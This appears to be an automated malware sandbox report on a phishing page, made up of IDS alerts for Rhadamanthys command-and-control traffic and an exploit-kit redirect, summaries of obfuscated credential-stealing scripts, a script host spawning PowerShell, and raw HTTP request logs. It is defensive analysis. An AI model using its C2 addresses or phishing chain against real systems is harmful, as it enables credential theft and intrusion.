2025-03-14T18:34:44.797923+0100 | 2047905 | 1 | A Network Trojan was detected | 192.168.2.16 | 49758 | 216.58.206.33 | 443 | TCP
2025-03-14T18:34:09.778041+0100 | 2823606 | 1 | Exploit Kit Activity Detected | 45.223.19.158 | 443 | 192.168.2.16 | 49735 | TCP
2025-03-14T18:36:00.075171+0100 | 2854824 | 2 | Potentially Bad Traffic | 185.208.159.170 | 2484 | 192.168.2.16 | 49797 | TCP
2025-03-14T18:36:08.952011+0100 | 2854824 | 2 | Potentially Bad Traffic | 185.208.159.170 | 2484 | 192.168.2.16 | 49805 | TCP
2025-03-14T18:36:15.642496+0100 | 2854824 | 2 | Potentially Bad Traffic | 185.208.159.170 | 2484 | 192.168.2.16 | 49806 | TCP
2025-03-14T18:34:44.797923+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49758 | 216.58.206.33 | 443 | TCP
2025-03-14T18:35:17.171651+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 2484 | 192.168.2.16 | 49775 | TCP
2025-03-14T18:36:00.075171+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 2484 | 192.168.2.16 | 49797 | TCP
2025-03-14T18:36:08.952011+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 2484 | 192.168.2.16 | 49805 | TCP
2025-03-14T18:36:15.642496+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 2484 | 192.168.2.16 | 49806 | TCP
2025-03-14T18:36:21.220893+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 443 | 192.168.2.16 | 49807 | TCP
2025-03-14T18:36:28.807419+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 443 | 192.168.2.16 | 49812 | TCP
2025-03-14T18:36:34.666437+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 443 | 192.168.2.16 | 49813 | TCP
2025-03-14T18:34:43.368533+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49757 | 216.58.206.33 | 443 | TCP
2025-03-14T18:34:44.797923+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49758 | 216.58.206.33 | 443 | TCP
2025-03-14T18:34:46.460713+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49759 | 185.166.143.49 | 443 | TCP


            Phishing

Source: 0.4.d.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script appears to be highly suspicious and likely malicious in nature.
Source: 0.9.d.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and heavy obfuscation. The use of `eval`, the `Function` constructor, and sending user data to unknown external domains are clear indicators of malicious intent. The overall level of obfuscation and lack of transparency make this script highly suspicious and potentially harmful.
Source: 0.0..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://securefilepro.netlify.app/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be engaging in malicious activities, such as redirecting to a suspicious domain and collecting user credentials. Given the combination of these behaviors, this script poses a high risk and should be further investigated.
Source: 0.3.d.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It appears to be a malicious script that collects user data and potentially redirects to a fake login page. The overall behavior is highly suspicious and poses a significant security risk.
Source: 0.2.d.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be engaging in malicious activities, such as redirecting to a suspicious domain and collecting user credentials. Given the combination of these behaviors, this script poses a high risk and should be further investigated.
Source: 0.12.d.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk indicators, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of an anonymous function with a long, obfuscated name and the presence of suspicious function calls suggest malicious intent. Without more context, this script should be considered a high-risk security threat.
Source: 0.11.d.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The extensive use of encoded strings and multiple fallback domains, along with the script's overall suspicious nature, indicate a high likelihood of malicious intent. This script should be considered a significant security risk.
Source: 0.10.d.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be a malicious phishing attempt, collecting user credentials and redirecting to a suspicious domain. The overall behavior is highly suspicious and poses a significant risk to users.
Source: 0.16..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://securefilepro.netlify.app/... The provided JavaScript snippet appears to be a highly suspicious and potentially malicious script. It exhibits several high-risk indicators:
  1. Dynamic Code Execution: The script uses the `Function` constructor to execute remote or dynamically generated code, which is a common technique used by malware.
  2. Data Exfiltration: The script appears to be sending sensitive data (potentially including cookies, user information, or session identifiers) to an external server, which is a clear sign of malicious intent.
  3. Obfuscated Code/URLs: The script is heavily obfuscated, making it difficult to analyze and understand its true purpose. This is a common tactic used by malicious actors to hide their activities.
  Given the combination of these high-risk behaviors, the script poses a significant threat and should be considered high-risk. Further investigation and analysis would be necessary to determine the exact nature and extent of the malicious activities.
Source: https://www.securefilepro.com/assets/sfp.html | HTTP Parser: No favicon
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: unknown | HTTPS traffic detected: 3.125.36.175:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 3.125.36.175:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.18.186.31:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 45.223.17.158:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.185.132:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 45.223.17.158:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49727 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.193.229:443 -> 192.168.2.16:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.193.229:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49745 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49750 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.16:49757 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.16:49759 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.208.159.170:443 -> 192.168.2.16:49807 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 192.168.2.16:49807 -> 185.208.159.170:443 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.208.159.170:443 -> 192.168.2.16:49812 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.208.159.170:443 -> 192.168.2.16:49813 version: TLS 1.2
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Adobe
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local

            Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: chrome.exe | Memory has grown: Private usage: 7MB, later: 44MB

            Networking

Source: Network traffic | Suricata IDS: 2047905 - Severity 1 - ET MALWARE Observed Malicious Powershell Loader Payload Request (GET) : 192.168.2.16:49758 -> 216.58.206.33:443
Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:2484 -> 192.168.2.16:49775
Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:2484 -> 192.168.2.16:49797
Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:2484 -> 192.168.2.16:49806
Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:2484 -> 192.168.2.16:49805
Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.2.16:49807
Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.2.16:49813
Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.2.16:49812
Source: Network traffic | Suricata IDS: 2823606 - Severity 1 - ETPRO EXPLOIT_KIT Possible Evil Redirect Leading to EK Dec 04 2016 : 45.223.19.158:443 -> 192.168.2.16:49735
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.16:49757 -> 216.58.206.33:443
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.16:49759 -> 185.166.143.49:443
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.16:49758 -> 216.58.206.33:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49758 -> 216.58.206.33:443
Source: Network traffic | Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 185.208.159.170:2484 -> 192.168.2.16:49797
Source: Network traffic | Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 185.208.159.170:2484 -> 192.168.2.16:49806
            Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 185.208.159.170:2484 -> 192.168.2.16:49805
            Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.186.131
            Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.186.131
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | TCP traffic detected without corresponding DNS query: 185.208.159.170
            Source: unknown | TCP traffic detected without corresponding DNS query: 185.208.159.170
            Source: unknown | TCP traffic detected without corresponding DNS query: 185.208.159.170
            Source: unknown | TCP traffic detected without corresponding DNS query: 185.208.159.170
            Source: unknown | TCP traffic detected without corresponding DNS query: 185.208.159.170
            Source: unknown | TCP traffic detected without corresponding DNS query: 185.208.159.170
            Source: unknown | TCP traffic detected without corresponding DNS query: 185.208.159.170
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: securefilepro.netlify.appConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /npm/javascript-obfuscator/dist/index.browser.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://securefilepro.netlify.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/jszip/3.10.1/jszip.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://securefilepro.netlify.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /portal/favicon.ico HTTP/1.1Host: securefilepro.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://securefilepro.netlify.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /portal/favicon.ico HTTP/1.1Host: securefilepro.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://securefilepro.netlify.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==
            Source: global trafficHTTP traffic detected: GET /portal/styles.cc0a641a0c9da1ad.css HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==
            Source: global trafficHTTP traffic detected: GET /portal/runtime.5be9c3325b3311c4.js HTTP/1.1Host: www.securefilepro.comConnection: keep-aliveOrigin: https://www.securefilepro.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==
            Source: global trafficHTTP traffic detected: GET /portal/polyfills.4aee66a14cad3606.js HTTP/1.1Host: www.securefilepro.comConnection: keep-aliveOrigin: https://www.securefilepro.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==
            Source: global trafficHTTP traffic detected: GET /portal/main.690005fd134686e7.js HTTP/1.1Host: www.securefilepro.comConnection: keep-aliveOrigin: https://www.securefilepro.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==
            Source: global trafficHTTP traffic detected: GET /npm/alertifyjs@1.13.1/build/css/alertify.min.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://www.securefilepro.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /npm/alertifyjs@1.13.1/build/alertify.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /_Incapsula_Resource?SWJIYLWA=719d34d31c8e3a6e6fffd425f7e032f3&ns=1&cb=123035775 HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==
